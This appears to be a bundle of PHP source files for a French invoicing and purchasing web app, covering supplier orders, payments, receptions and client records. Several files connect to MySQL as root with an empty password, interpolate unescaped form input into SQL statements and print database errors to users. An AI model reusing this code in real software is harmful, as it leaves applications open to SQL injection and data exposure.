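// Illustrative sketch only, never called here: the repeated art/qte/pvht
// assignments above follow a strict 1..12 naming scheme, so they can be pulled
// from the quote row in one loop. The helper name is an assumption; the column
// names are the ones used by this file.
function copy_line_items($row) {
	$items = array();
	for ($i = 1; $i <= 12; $i++) {
		$items["art$i"]  = $row["art$i"];   // article description
		$items["qte$i"]  = $row["qte$i"];   // quantity
		$items["pvht$i"] = $row["pvht$i"];  // unit price excl. VAT
	}
	return $items;
}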
include ('../../../inc/header.php');
include ('../../../inc/pagecontainer.php');
?>
<!-- BEGIN PAGE CONTAINER-->
<div class="page-content">
<!-- BEGIN SAMPLE PORTLET CONFIGURATION MODAL FORM-->
<div id="portlet-config" class="modal hide">
<div class="modal-header">
<button data-dismiss="modal" class="close" type="button"></button>
<h3>Widget Settings</h3>
</div>
<div class="modal-body"> Widget settings form goes here </div>
</div>
<div class="clearfix"></div>
<div class="content">
<ul class="breadcrumb">
<li>
<p>VOUS ETES ICI</p>
</li>
<li><a href="#">ACHAT</a> </li>
<li><a href="index.devis.php">DEVIS</a></li>
<li><a href="nouv.client.php" class="active"><span class="semi-bold">Transfere en Commande</span></a></li>
</ul>
<div class="page-title"> <i class="icon-custom-left"></i>
<h3>ACHAT - <span class="semi-bold">Transfere en commande</span></h3>
</div>
<?php
if($result_cmd_four == true){
?>
<div class="row">
<div class="col-md-12">
<div class="grid simple">
<div class="grid-body no-border">
<div class="row-fluid">
<div class="alert alert-block alert-success fade in">
<button data-dismiss="alert" class="close" type="button"></button>
<h4 class="alert-heading"><i class="icon-warning-sign"></i> SUCCES!</h4>
<p> La Commande Numéro CMDFOUR000<?php echo $iddevisfour; ?> a été transférée avec succès. </p>
</div>
</div>
</div>
</div>
</div>
</div>
<?php } ?>
<?php
if($result_cmd_four == false){
?>
<div class="row">
<div class="col-md-12">
<div class="grid simple">
<div class="grid-body no-border">
<div class="row-fluid">
<div class="alert alert-block alert-error fade in">
<button data-dismiss="alert" class="close" type="button"></button>
<h4 class="alert-heading"><i class="icon-warning-sign"></i> ERROR!</h4>
<p> Une erreur de type <b><?php echo mysql_error(); ?></b> s'est produite. Vérifiez votre code. </p>
</div>
</div>
</div>
</div>
</div>
</div>
<?php } ?>
</div>
</div>
</div>
<!-- END CONTAINER -->
<!-- END CONTAINER -->
<!-- BEGIN CORE JS FRAMEWORK-->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-1.8.3.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-ui/jquery-ui-1.10.1.custom.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap/js/bootstrap.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/breakpoints.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-unveil/jquery.unveil.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-block-ui/jqueryblockui.js" type="text/javascript"></script>
<!-- END CORE JS FRAMEWORK -->
<!-- BEGIN PAGE LEVEL JS -->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slider/jquery.sidr.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slimscroll/jquery.slimscroll.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/pace/pace.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-numberAnimate/jquery.animateNumbers.js" type="text/javascript"></script>
<!-- END PAGE LEVEL PLUGINS -->
<!-- BEGIN CORE TEMPLATE JS -->
<script src="<?php echo $rootsite; ?>assets/js/core.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/chat.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/demo.js" type="text/javascript"></script>
<!-- END CORE TEMPLATE JS -->
</body>
</html><file_sep>
<?php include ('inc/header.php'); ?>
<?php include ('inc/pagecontainer.php'); ?>
<?php
// Load the overall sales and purchase totals
$sql_total_vente = mysql_query("SELECT SUM(ptttc_fact_cli) as somme FROM fact_cli");
$donnee_total_vente = mysql_fetch_row($sql_total_vente);
$sql_total_achat = mysql_query("SELECT SUM(ptttc_fact_four) as somme FROM fact_four");
$donnee_total_achat = mysql_fetch_row($sql_total_achat);
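// Minimal helper sketch (assumption, not used by this page): wraps the
// SELECT SUM(...) pattern above and maps an empty table (SUM = NULL) to 0.
function sum_column($table, $column) {
	$res = mysql_query("SELECT SUM($column) AS somme FROM $table");
	$row = mysql_fetch_row($res);
	return ($row && $row[0] !== null) ? (float) $row[0] : 0.0;
}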
?>
<div class="page-content">
<div class="content">
<!-- BEGIN PAGE TITLE -->
<div class="row">
<div class="col-md-6 col-vlg-6 col-sm-6">
<div class="tiles green added-margin m-b-20">
<div class="tiles-body">
<div class="controller"> <a class="reload" href="javascript:;"></a> <a class="remove" href="javascript:;"></a> </div>
<div class="tiles-title text-black">Ventes</div>
<div class="widget-stats">
<div class="wrapper transparent">
<span class="item-title">Total des Ventes</span> <span data-animation-duration="700" data-value="<?php echo $donnee_total_vente[0]; ?>€" class="item-count animate-number semi-bold">2,415€</span>
</div>
</div>
</div>
</div>
</div>
<div class="col-md-6 col-vlg-6 col-sm-6">
<div class="tiles blue added-margin m-b-20">
<div class="tiles-body">
<div class="controller"> <a class="reload" href="javascript:;"></a> <a class="remove" href="javascript:;"></a> </div>
<div class="tiles-title text-black">Achats </div>
<div class="widget-stats">
<div class="wrapper transparent">
<span class="item-title">Total des Achats</span> <span data-animation-duration="700" data-value="<?php echo $donnee_total_achat[0]; ?>€" class="item-count animate-number semi-bold">15,489</span>
</div>
</div>
</div>
</div>
</div>
</div>
<?php
$sql_vos_vente_total = mysql_query("SELECT SUM(ptttc_fact_cli) as somme FROM fact_cli WHERE iduser =" .$donnees_login['iduser']);
$donnee_vos_vente_total = mysql_fetch_row($sql_vos_vente_total);
$sql_vos_vente_aujourdhui = mysql_query("SELECT SUM(ptttc_fact_cli) as total FROM fact_cli WHERE (`iduser` = '".$donnees_login['iduser']."' AND `date_facture` = '".$date."')");
$donnee_vos_vente_aujourdui = mysql_fetch_row($sql_vos_vente_aujourdhui);
$sql_vos_vente_mois = mysql_query("SELECT SUM(ptttc_fact_cli) as date_mois FROM fact_cli WHERE date_facture BETWEEN '$date_mois_deb' AND '$date_mois_fin' AND iduser = ".$donnees_login['iduser']);
$donnee_vos_vente_mois = mysql_fetch_row($sql_vos_vente_mois);
?>
<div class="row">
<!-- BEGIN REALTIME SALES GRAPH -->
<div class="col-md-12 col-vlg-12 m-b-20 ">
<div class="tiles white added-margin">
<div class="row ">
<div class="p-t-35 p-l-45">
<div class="col-md-5 col-sm-5 no-padding">
<h5 class="no-margin">Vos Ventes totals</h5>
<h4><span data-animation-duration="700" data-value="<?php echo $donnee_vos_vente_total[0]; ?>" class="item-count animate-number semi-bold">0</span> EUR</h4>
</div>
<div class="col-md-3 col-sm-3 no-padding">
<p class="semi-bold">Aujourd'hui le <?php echo $date; ?></p>
<h4><span data-animation-duration="700" data-value="<?php echo $donnee_vos_vente_aujourdui[0]; ?>" class="item-count animate-number semi-bold">0</span> EUR</h4>
</div>
<div class="col-md-3 col-sm-3 no-padding">
<p class="semi-bold">Entre le <?php echo $date_mois_deb; ?> et le <?php echo $date_mois_fin; ?>
</p>
<h4><span data-animation-duration="700" data-value="<?php echo $donnee_vos_vente_mois[0]; ?>" class="item-count animate-number semi-bold">0</span> EUR</h4>
</div>
<div class="clearfix"></div>
</div>
</div>
<h5 class="semi-bold m-t-30 m-l-30">Dernière Ventes</h5>
<table class="table no-more-tables m-t-20 m-l-20 m-b-30">
<thead style="display:none">
<tr>
<th style="width:9%">N° Facture</th>
<th style="width:22%">Client</th>
<th style="width:6%">Montant</th>
<th style="width:1%"> </th>
</tr>
</thead>
<tbody>
<?php
$sql_derniere_facture = mysql_query("SELECT * FROM fact_cli, client WHERE fact_cli.idclient = client.idclient AND fact_cli.iduser = client.iduser");
while($donnee_derniere_facture = mysql_fetch_array($sql_derniere_facture))
{
?>
<tr>
<td class="v-align-middle bold text-success"><?php echo $donnee_derniere_facture['idfactcli']; ?></td>
<td class="v-align-middle"><span class="muted"><?php echo $donnee_derniere_facture['nom']; ?> <?php echo $donnee_derniere_facture['prenom']; ?></span> </td>
<td><span class="muted bold text-success"><?php echo $donnee_derniere_facture['ptttc_fact_cli']; ?> €</span> </td>
<td class="v-align-middle"></td>
</tr>
<?php } ?>
</tbody>
</table>
</div>
</div>
<!-- END REALTIME SALES GRAPH -->
</div>
</div>
</div>
<!-- END PAGE TITLE -->
<!-- BEGIN PlACE PAGE CONTENT HERE -->
<!-- END PLACE PAGE CONTENT HERE -->
</div>
</div>
<!-- END PAGE CONTAINER -->
</div>
<!-- END CONTENT -->
</body>
</html><file_sep><?php
mysql_connect("localhost", "root", "");
mysql_select_db("gestion");
$idfactfour = (int) $_GET['idfactfour']; // cast keeps the id numeric before it is concatenated into the query below
$sql_fact_four = mysql_query("SELECT * FROM fact_four WHERE idfactfour =".$idfactfour);
$donnee_fact_four = mysql_fetch_array($sql_fact_four);
$etat_fact_four = $donnee_fact_four['etat_fact_four'];
// Verify the invoice exists before rendering the payment form; a guard sketch follows
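// Hedged guard sketch: stopping with a redirect when the id matches no invoice is
// an assumption about the desired behaviour, not taken from the original code.
if (!$donnee_fact_four) {
	header('Location: index.facture.php'); // back to the invoice list
	exit;
}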
include ('../../../inc/header.php');
include ('../../../inc/pagecontainer.php');
?>
<!-- BEGIN PAGE CONTAINER-->
<div class="page-content">
<!-- BEGIN SAMPLE PORTLET CONFIGURATION MODAL FORM-->
<div id="portlet-config" class="modal hide">
<div class="modal-header">
<button data-dismiss="modal" class="close" type="button"></button>
<h3>Widget Settings</h3>
</div>
<div class="modal-body"> Widget settings form goes here </div>
</div>
<div class="clearfix"></div>
<div class="content">
<ul class="breadcrumb">
<li>
<p>VOUS ETES ICI</p>
</li>
<li><a href="#">ACHAT</a> </li>
<li><a href="index.facture.php">FACTURE</a></li>
<li><a href="nouv.facture.php" class="active"><span class="semi-bold">Réglement facture</span></a></li>
</ul>
<div class="page-title"> <i class="icon-custom-left"></i>
<h3>ACHAT - <span class="semi-bold">Réglement Facture</span></h3>
</div>
<div class="row">
<div class="col-md-12">
<div class="grid simple">
<div class="grid-title no-border">
<h4>Facture - <span class="semi-bold">Réglement</span></h4>
<div class="tools"> <a class="collapse" href="javascript:;"></a> <a class="config" data-toggle="modal" href="#grid-config"></a> <a class="reload" href="javascript:;"></a> <a class="remove" href="javascript:;"></a> </div>
</div>
<div class="grid-body no-border">
<form action="valid.reg.facture.php" id="form_traditional_validation" novalidate="novalidate">
<div class="form-group">
<label class="form-label">Numéro de la Facture</label>
<div class="input-with-icon right">
<i class=""></i>
<input type="text" class="form-control" id="form1CardHolderName" name="idfactfour" value="<?php echo $donnee_fact_four['idfactfour']; ?>">
</div>
</div>
<div class="form-group">
<label class="form-label">Mode de Réglement</label>
<span class="help">Séléctionner le mode de reglement</span>
<div class="input-with-icon right">
<i class=""></i>
<select class="select2" name="mode_reglement">
<option value="1">Espèce</option>
<option value="2">CB Comptant</option>
<option value="3">CB 3 Fois</option>
<option value="4">Chèque Comptant</option>
<option value="5">Chèque 2 Fois</option>
<option value="6">Chèque 3 Fois</option>
<option value="7" disabled>Virement</option>
<option value="8" disabled>Prélèvement</option>
</div>
</div>
<div class="form-group">
<label class="form-label">Montant n°1</label>
<div class="input-with-icon right">
<i class=""></i>
<input type="text" class="form-control" id="form1CardHolderName" name="montant_reg1">
</div>
</div>
<div class="form-group">
<label class="form-label">Montant n°2</label>
<div class="input-with-icon right">
<i class=""></i>
<input type="text" class="form-control" id="form1CardHolderName" name="montant_reg2">
</div>
</div>
<div class="form-group">
<label class="form-label">Montant n°3</label>
<div class="input-with-icon right">
<i class=""></i>
<input type="text" class="form-control" id="form1CardHolderName" name="montant_reg3">
</div>
</div>
<div class="form-actions">
<div class="pull-right">
<button class="btn btn-success btn-cons" type="submit">Valider</button>
<button class="btn btn-white btn-cons" type="button">Cancel</button>
</div>
</div>
</form>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<!-- END CONTAINER -->
<!-- END CONTAINER -->
<!-- BEGIN CORE JS FRAMEWORK-->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-1.8.3.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-ui/jquery-ui-1.10.1.custom.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap/js/bootstrap.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/breakpoints.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-unveil/jquery.unveil.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-block-ui/jqueryblockui.js" type="text/javascript"></script>
<!-- END CORE JS FRAMEWORK -->
<!-- BEGIN PAGE LEVEL JS -->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slider/jquery.sidr.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slimscroll/jquery.slimscroll.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/pace/pace.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-numberAnimate/jquery.animateNumbers.js" type="text/javascript"></script>
<!-- END PAGE LEVEL PLUGINS -->
<!-- BEGIN CORE TEMPLATE JS -->
<script src="<?php echo $rootsite; ?>assets/js/core.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/chat.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/demo.js" type="text/javascript"></script>
<!-- END CORE TEMPLATE JS -->
</body>
</html><file_sep><?php
include ('../../../inc/header.php');
include ('../../../inc/pagecontainer.php');
$date = date("d-m-Y");
$date_liv_poss = date('d-m-Y', strtotime("+2 days"));
?>
<!-- BEGIN PAGE CONTAINER-->
<div class="page-content">
<!-- BEGIN SAMPLE PORTLET CONFIGURATION MODAL FORM-->
<div id="portlet-config" class="modal hide">
<div class="modal-header">
<button data-dismiss="modal" class="close" type="button"></button>
<h3>Widget Settings</h3>
</div>
<div class="modal-body"> Widget settings form goes here </div>
</div>
<div class="clearfix"></div>
<div class="content">
<ul class="breadcrumb">
<li>
<p>VOUS ETES ICI</p>
</li>
<li><a href="#">ACHAT</a> </li>
<li><a href="index.reception.php" class="active">RECEPTION</a></li>
</ul>
<div class="page-title"> <a href="<?php echo $rootsite; ?>"><i class="icon-custom-left"></i></a>
<h3>Achat - <span class="semi-bold">RECEPTION</span></h3>
</div>
<div class="row-fluid">
<div class="span12">
<div class="grid simple ">
<div class="grid-title">
<h4>Liste des <span class="semi-bold">Reception Fournisseur</span></h4>
<a href="nouv.reception.php"><button class="btn btn-primary btn-cons" type="button"><i class="fa fa-plus"></i> Nouvelle Reception</button></a>
<div class="tools"> <a href="javascript:;" class="collapse"></a> <a href="#grid-config" data-toggle="modal" class="config"></a> <a href="javascript:;" class="reload"></a> <a href="javascript:;" class="remove"></a> </div>
</div>
<div class="grid-body ">
<table class="table table-striped" id="example2" >
<thead>
<tr>
<th>ID Commande</th>
<th>Date de réception</th>
<th>Fournisseur</th>
<th>Action</th>
<th></th>
<th HIDDEN>Etat</th>
</tr>
</thead>
<tbody>
<?php
$sql_reception_four = mysql_query("SELECT * FROM reception_four, fournisseur WHERE reception_four.idfournisseur = fournisseur.idfournisseur");
while($donnee_reception_four = mysql_fetch_array($sql_reception_four))
{
?>
<tr class="odd gradeX">
<td>RECFOUR000<?php echo $donnee_reception_four['idreceptionfour']; ?></td>
<td><?php echo $donnee_reception_four['date_reception_four']; ?></td>
<td><?php echo $donnee_reception_four['raison_social']; ?></td>
<td>
<a href="fiche.reception.php?idreceptionfour=<?php echo $donnee_reception_four['idreceptionfour']; ?>"><button class="btn btn-primary btn-cons" type="button"><i class="fa fa-eye"></i> Fiche Reception</button></a>
<a href="supp.reception.php?idreceptionfour=<?php echo $donnee_reception_four['idreceptionfour']; ?>"><button class="btn btn-primary btn-cons" type="button"><i class="fa fa-eraser"></i> Supprimer</button>
</td>
<td></td>
<td HIDDEN>
<?php
switch($donnee_reception_four['etat_reception_four'])
{
case 1:
echo "<p class='text-info'>Commande en cour de reception</p>";
break;
case 2:
echo "<p class='text-success'>Commande récéptionné</p>";
break;
case 3:
echo "<p class='text-success'>Transférer en Facture</p>";
break;
}
?>
</td>
</tr>
<?php } ?>
</tbody>
</table>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<!-- END PAGE -->
<!-- END CONTAINER -->
<!-- BEGIN CORE JS FRAMEWORK-->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-1.8.3.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-ui/jquery-ui-1.10.1.custom.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap/js/bootstrap.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/breakpoints.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-unveil/jquery.unveil.min.js" type="text/javascript"></script>
<!-- END CORE JS FRAMEWORK -->
<!-- BEGIN PAGE LEVEL JS -->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-block-ui/jqueryblockui.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slider/jquery.sidr.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-numberAnimate/jquery.animateNumbers.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slimscroll/jquery.slimscroll.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap-select2/select2.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-datatable/js/jquery.dataTables.min.js" type="text/javascript" ></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-datatable/extra/js/TableTools.min.js" type="text/javascript" ></script>
<script type="text/javascript" src="<?php echo $rootsite; ?>assets/plugins/datatables-responsive/js/datatables.responsive.js"></script>
<script type="text/javascript" src="<?php echo $rootsite; ?>assets/plugins/datatables-responsive/js/lodash.min.js"></script>
<!-- END PAGE LEVEL PLUGINS -->
<script src="<?php echo $rootsite; ?>assets/js/datatables.js" type="text/javascript"></script>
<!-- BEGIN CORE TEMPLATE JS -->
<script src="<?php echo $rootsite; ?>assets/js/core.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/chat.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/demo.js" type="text/javascript"></script>
<!-- END CORE TEMPLATE JS -->
<!-- END JAVASCRIPTS -->
</body>
</html>
<file_sep><?php
$idclient = (int) $_POST['idclient']; // cast keeps the id numeric for the UPDATE below
$civilite = $_POST['civilite'];
$iduser = $_POST['iduser'];
$nom = $_POST['nom'];
$prenom = $_POST['prenom'];
$adresse1 = $_POST['adresse1'];
$adresse2 = $_POST['adresse2'];
$cp = $_POST['cp'];
$ville = $_POST['ville'];
$tel = $_POST['tel'];
$fax = $_POST['fax'];
$port = $_POST['port'];
$mail = $_POST['mail'];
$raison_social = $_POST['raison_social'];
$num_siret = $_POST['num_siret'];
$num_tva = $_POST['num_tva'];
$code_banque = $_POST['code_banque'];
$code_guichet = $_POST['code_guichet'];
$code_cpt = $_POST['code_cpt'];
$cle_rib = $_POST['cle_rib'];
$mode_paiement_default = $_POST['mode_paiement_default'];
$encour = $_POST['encour'];
$iban = $_POST['iban'];
$bic = $_POST['bic'];
$mail_paypal = $_POST['mail_paypal'];
mysql_connect("localhost", "root", "");
mysql_select_db("gestion");
$sql_client = "UPDATE `client` SET `iduser`='$iduser',`raison_social`='$raison_social',`num_siret`='$num_siret',`num_tva`='$num_tva',`civilite`='$civilite',`nom`='$nom',`prenom`='$prenom',`adresse1`='$adresse1',
`adresse2`='$adresse2',`cp`='$cp',`ville`='$ville',`tel`='$tel',`fax`='$fax',`port`='$port',`mail`='$mail',`mode_paiement_default`='$mode_paiement_default',`code_banque`='$code_banque',`code_guichet`='$code_guichet',
`code_cpt`='$code_cpt',`cle_rib`='$cle_rib',`iban`='$iban',`bic`='$bic',`encour`='$encour',`mail_paypal`='$mail_paypal' WHERE idclient =".$idclient;
$result_client = mysql_query($sql_client); // keep the result so the success/error blocks below can test it
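// Sketch only, never called: the raw $_POST values above are interpolated
// straight into the UPDATE; with the legacy mysql extension used here, a minimal
// guard would escape each field first. The function name is an assumption.
function escape_post($post) {
	$clean = array();
	foreach ($post as $key => $value) {
		$clean[$key] = mysql_real_escape_string($value); // protects the quoted SQL literals
	}
	return $clean;
}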
include ('../../../inc/header.php');
include ('../../../inc/pagecontainer.php');
?>
<!-- BEGIN PAGE CONTAINER-->
<div class="page-content">
<!-- BEGIN SAMPLE PORTLET CONFIGURATION MODAL FORM-->
<div id="portlet-config" class="modal hide">
<div class="modal-header">
<button data-dismiss="modal" class="close" type="button"></button>
<h3>Widget Settings</h3>
</div>
<div class="modal-body"> Widget settings form goes here </div>
</div>
<div class="clearfix"></div>
<div class="content">
<ul class="breadcrumb">
<li>
<p>VOUS ETES ICI</p>
</li>
<li><a href="#">Donnée</a> </li>
<li><a href="index.php">Client</a></li>
<li><a href="nouv.client.php" class="active"><span class="semi-bold">Modifier Client</span></a></li>
</ul>
<div class="page-title"> <i class="icon-custom-left"></i>
<h3>CLIENT - <span class="semi-bold">Modifier Client</span></h3>
</div>
<?php
if($result_client == true){
?>
<div class="row">
<div class="col-md-12">
<div class="grid simple">
<div class="grid-body no-border">
<div class="row-fluid">
<div class="alert alert-block alert-success fade in">
<button data-dismiss="alert" class="close" type="button"></button>
<h4 class="alert-heading"><i class="icon-warning-sign"></i> SUCCES!</h4>
<p> Le client <b><?php echo $nom; ?> <?php echo $prenom; ?></b> a été modifié avec succès. </p>
</div>
</div>
</div>
</div>
</div>
</div>
<?php } ?>
<?php
if($result_client == false){
?>
<div class="row">
<div class="col-md-12">
<div class="grid simple">
<div class="grid-body no-border">
<div class="row-fluid">
<div class="alert alert-block alert-error fade in">
<button data-dismiss="alert" class="close" type="button"></button>
<h4 class="alert-heading"><i class="icon-warning-sign"></i> ERROR!</h4>
<p> Une erreur de type <b><?php echo mysql_error(); ?></b> s'est produite. Vérifiez votre code. </p>
</div>
</div>
</div>
</div>
</div>
</div>
<?php } ?>
</div>
</div>
</div>
<!-- END CONTAINER -->
<!-- END CONTAINER -->
<!-- BEGIN CORE JS FRAMEWORK-->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-1.8.3.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-ui/jquery-ui-1.10.1.custom.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap/js/bootstrap.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/breakpoints.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-unveil/jquery.unveil.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-block-ui/jqueryblockui.js" type="text/javascript"></script>
<!-- END CORE JS FRAMEWORK -->
<!-- BEGIN PAGE LEVEL JS -->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slider/jquery.sidr.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slimscroll/jquery.slimscroll.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/pace/pace.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-numberAnimate/jquery.animateNumbers.js" type="text/javascript"></script>
<!-- END PAGE LEVEL PLUGINS -->
<!-- BEGIN CORE TEMPLATE JS -->
<script src="<?php echo $rootsite; ?>assets/js/core.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/chat.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/demo.js" type="text/javascript"></script>
<!-- END CORE TEMPLATE JS -->
</body>
</html><file_sep><?php
$idfactfour = (int) $_POST['idfactfour']; // cast keeps the id numeric for the SQL below
$mode_reglement = $_POST['mode_reglement'];
$montant_reg1 = $_POST['montant_reg1'];
$montant_reg2 = $_POST['montant_reg2'];
$montant_reg3 = $_POST['montant_reg3'];
mysql_connect("localhost", "root", "");
mysql_select_db("gestion");
$sql_reg_fact_four = "INSERT INTO `reg_fact_four`(`idregfactfour`, `idfactfour`, `mode_reglement`, `montant_reg1`, `montant_reg2`, `montant_reg3`) VALUES ('','$idfactfour','$mode_reglement',
'$montant_reg1','$montant_reg2','$montant_reg3')";
$sql_fact_four = mysql_query("SELECT * FROM fact_four WHERE idfactfour=".$idfactfour);
$donnee_fact_four = mysql_fetch_array($sql_fact_four);
$montant_total_reg = $montant_reg1+$montant_reg2+$montant_reg3;
if($donnee_fact_four['ptttc_fact_four'] != $montant_total_reg)
{
	mysql_query("UPDATE fact_four SET etat_fact_four = 3 WHERE idfactfour = ".$idfactfour); // partially paid: only this invoice
}
else
{
	mysql_query("UPDATE fact_four SET etat_fact_four = 4 WHERE idfactfour = ".$idfactfour); // fully settled: only this invoice
}
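// Sketch of the decision above, factored into a helper (the function name is an
// assumption; state codes 3 = partially paid and 4 = settled follow this file).
function reglement_state($total_facture, $total_regle) {
	return ($total_facture != $total_regle) ? 3 : 4;
}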
$result_reg_fact_four = mysql_query($sql_reg_fact_four); // actually run the INSERT; the success/error blocks below test the result
include ('../../../inc/header.php');
include ('../../../inc/pagecontainer.php');
?>
<!-- BEGIN PAGE CONTAINER-->
<div class="page-content">
<!-- BEGIN SAMPLE PORTLET CONFIGURATION MODAL FORM-->
<div id="portlet-config" class="modal hide">
<div class="modal-header">
<button data-dismiss="modal" class="close" type="button"></button>
<h3>Widget Settings</h3>
</div>
<div class="modal-body"> Widget settings form goes here </div>
</div>
<div class="clearfix"></div>
<div class="content">
<ul class="breadcrumb">
<li>
<p>VOUS ETES ICI</p>
</li>
<li><a href="#">ACHAT</a> </li>
<li><a href="index.facture.php">FACTURE</a></li>
<li><a href="reg.facture.php" class="active"><span class="semi-bold">Reglement Facture</span></a></li>
</ul>
<div class="page-title"> <i class="icon-custom-left"></i>
<h3>ACHAT - <span class="semi-bold">Reglement Facture</span></h3>
</div>
<?php
if($result_reg_fact_four == true){
?>
<div class="row">
<div class="col-md-12">
<div class="grid simple">
<div class="grid-body no-border">
<div class="row-fluid">
<div class="alert alert-block alert-success fade in">
<button data-dismiss="alert" class="close" type="button"></button>
<h4 class="alert-heading"><i class="icon-warning-sign"></i> SUCCES!</h4>
<p> Le règlement de la facture N° <b>FACFOUR000<?php echo $idfactfour; ?></b> a été créé avec succès. </p>
</div>
</div>
</div>
</div>
</div>
</div>
<?php } ?>
<?php
if($result_reg_fact_four == false){
?>
<div class="row">
<div class="col-md-12">
<div class="grid simple">
<div class="grid-body no-border">
<div class="row-fluid">
<div class="alert alert-block alert-error fade in">
<button data-dismiss="alert" class="close" type="button"></button>
<h4 class="alert-heading"><i class="icon-warning-sign"></i> ERROR!</h4>
<p> Une erreur de type <b><?php echo mysql_error(); ?></b> s'est produite. Vérifiez votre code. </p>
</div>
</div>
</div>
</div>
</div>
</div>
<?php } ?>
</div>
</div>
</div>
<!-- END CONTAINER -->
<!-- END CONTAINER -->
<!-- BEGIN CORE JS FRAMEWORK-->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-1.8.3.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-ui/jquery-ui-1.10.1.custom.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap/js/bootstrap.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/breakpoints.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-unveil/jquery.unveil.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-block-ui/jqueryblockui.js" type="text/javascript"></script>
<!-- END CORE JS FRAMEWORK -->
<!-- BEGIN PAGE LEVEL JS -->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slider/jquery.sidr.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slimscroll/jquery.slimscroll.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/pace/pace.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-numberAnimate/jquery.animateNumbers.js" type="text/javascript"></script>
<!-- END PAGE LEVEL PLUGINS -->
<!-- BEGIN CORE TEMPLATE JS -->
<script src="<?php echo $rootsite; ?>assets/js/core.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/chat.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/demo.js" type="text/javascript"></script>
<!-- END CORE TEMPLATE JS -->
</body>
</html><file_sep><?php
$designation = $_POST['desc_court'];
$idfamillearticle = $_POST['idfamillearticle'];
$idsousfamillearticle = $_POST['idsousfamillearticle'];
$idfournisseur = $_POST['idfournisseur'];
$ref_fournisseur = $_POST['ref_fournisseur'];
$ref_interne = $_POST['ref_interne'];
$date_debut = $_POST['date_debut'];
$date_fin = $_POST['date_fin'];
$duree_garantie = $_POST['duree_garantie'];
$num_serie = $_POST['num_serie'];
$code_barre = $_POST['code_barre'];
